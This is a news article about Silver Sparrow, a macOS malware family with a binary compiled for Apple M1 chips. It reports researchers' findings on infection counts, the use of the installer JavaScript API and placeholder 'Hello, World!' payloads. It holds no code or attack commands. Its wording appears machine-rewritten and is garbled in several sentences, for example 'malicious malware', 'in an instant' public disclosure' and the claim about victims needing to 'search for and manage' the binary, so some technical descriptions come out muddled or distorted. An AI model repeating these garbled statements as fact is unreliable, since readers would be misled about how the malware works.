More malware affecting Apple Silicon Macs has been discovered, but researchers have noted that there is currently no malicious payload.
There seems to be more malware targeting Apple’s M1-based Macs than previously thought. After the initial reports of the first M1 malware found in the wild, it appears that there are more infections of malware, but of a particularly toothless variety.
In early February, Red Canary researchers discovered a type of macOS malware that LaunchAgent used to create its presence, just like other forms of malware. What was interesting to the researchers was that the malware behaved differently from typical adware, due to the use of JavaScript for execution.
The malware group, referred to by the researchers as ‘Silver Sparrow’, also contained a binary compiled to work with M1 chips. This created malware that could potentially target Apple Silicon Macs.
Further research by researchers at VMware Carbon Black and Malwarebytes determined that Silver Sparrow was probably a “previously unmarked type of malware”. On February 17, it was detected in 29,139 macOS endpoints in 153 countries, with the majority of infections in the US, UK, Canada, France and Germany.
At the time of publication, the malware was not used to deliver a malicious payload to the victim Macs, but it may change in the future. Due to the compatibility with M1, the “relatively high infection rate” and the operational maturity of the malware, it is considered a serious enough threat that is ‘uniquely positioned to deliver a potentially effective payload in an instant’ public disclosure.
Two versions of the malware have been discovered, with one version’s payload consisting of a binary affecting only Intel-based Macs, while the other is a binary compiled for both Intel and M1 architectures. The payload is apparently a placeholder, because the first version opens a window that literally says “Hello, World!” and the second says, “You have done it!”
![An example of the included binary [via Red Canary]](https://i0.wp.com/photos5.appleinsider.com/gallery/40419-77860-image3-xl.jpg?w=560&ssl=1)
If it was malicious malware, the payload could potentially affect the same or similar payload instructions through both architectures from one executable program.
The malware mechanism works around files titled “update.pkg” and “updater.pkg”, under the guise of installers. They use the macOS Installer JavaScript API to execute the suspicious commands.
This is a behavior that is sometimes seen with legitimate software and not with malware, which usually uses pre- or post-installation scripts to execute commands.
Once successful, the infection tries to check a specific download file URL, which may contain further instructions or a final payload. A week of monitoring the malware has resulted in no visible final payload available, which may change in the future.
There are several questions that are not answered to the researchers about Silver Sparrow. These include where the initial PKG files were used to infect systems, and elements of the malware’s code that appear to be part of a wider toolkit.
“The ultimate purpose of this malware is a mystery,” admits Red Canary. “We have no way of knowing with certainty what payload will be distributed by the malware, if a payload has already been delivered and removed, or if the adversary has a future timeline for distribution.”
There is also the demand for the inclusion of the ‘Hello World’ executable programs, as the binary will not work unless a victim actually searches for it and manages it, rather than running it automatically. The executable programs suggest that it may be a malware for underdevelopment, or that an application bundle is needed to make the malware appear legal to other parties.